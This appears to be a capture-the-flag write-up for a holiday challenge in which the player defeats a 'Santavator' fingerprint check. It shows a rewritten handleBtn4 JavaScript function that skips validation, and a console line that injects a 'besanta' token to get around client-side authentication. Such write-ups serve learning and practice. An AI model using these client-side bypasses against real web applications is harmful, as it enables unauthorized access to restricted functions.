10) Defeat Fingerprint Sensor

Dificulty: 3/5

Bypass the Santavator fingerprint sensor. Enter Santa's office without Santa's fingerprint.

Client side authentication

The elevator works using client side validations to check if the button is enabled and if the token besanta is on the list of tokens.

The code that validates the fingerprint is downloaded from https://elevator.kringlecastle.com/app.js.

The simplest bypass is to modify the code in Chrome and replace the function handleBtn4 from the line 349 to 381 with one that performs no validation and save the changes.

const handleBtn4 = () => {
  const cover = document.querySelector('.print-cover');
  cover.classList.add('open');

  cover.addEventListener('click', () => {
    $.ajax({
        type: 'POST',
        url: POST_URL,
        dataType: 'json',
        contentType: 'application/json',
        data: JSON.stringify({ 
          targetFloor: '3',
          id: getParams.id,
        }),
        success: (res, status) => {
          if (res.hash) {
            __POST_RESULTS__({
              resourceId: getParams.id || '1111',
              hash: res.hash,
              action: 'goToFloor-3',
            });
          }
        }
      });
  });
};

Once the changes to the local code is saved we press the fingerprint button.

Alternate solution

We can also use the Chrome console to modify the content of the variables in the DOM and push the right tokens.

tokens = ["marble", "elevator-key", "nut2", "yellowlight", "candycane", "nut", "ball", "greenlight", "workshop-button", "redlight", "besanta"]